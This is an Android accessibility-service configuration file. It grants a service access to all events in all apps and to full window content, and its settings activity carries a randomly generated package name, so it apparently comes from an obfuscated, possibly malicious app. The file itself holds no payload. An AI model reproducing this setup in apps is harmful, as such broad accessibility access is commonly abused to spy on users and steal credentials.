<?xml version="1.0" encoding="utf-8"?>
<accessibility-service android:description="@string/Descrip" android:settingsActivity="com.eagle.vhasjbytsejmchjytybqaiucxsovcftvkngegomeqdvgmgvqzg2.lrnkvbkuoyhwwjjclyatabmdqjrxgnnkcjvzuleormlwhiwnjt3.udlulikgqndphqbmkgvudxfevutjfxlaynwrlvgbgzubcxwqxw17" android:accessibilityEventTypes="typeAllMask" android:packageNames="@null" android:accessibilityFeedbackType="feedbackAllMask" android:notificationTimeout="0" android:accessibilityFlags="flagDefault|flagIncludeNotImportantViews|flagReportViewIds|flagRetrieveInteractiveWindows" android:canRetrieveWindowContent="true"
  xmlns:android="http://schemas.android.com/apk/res/android" />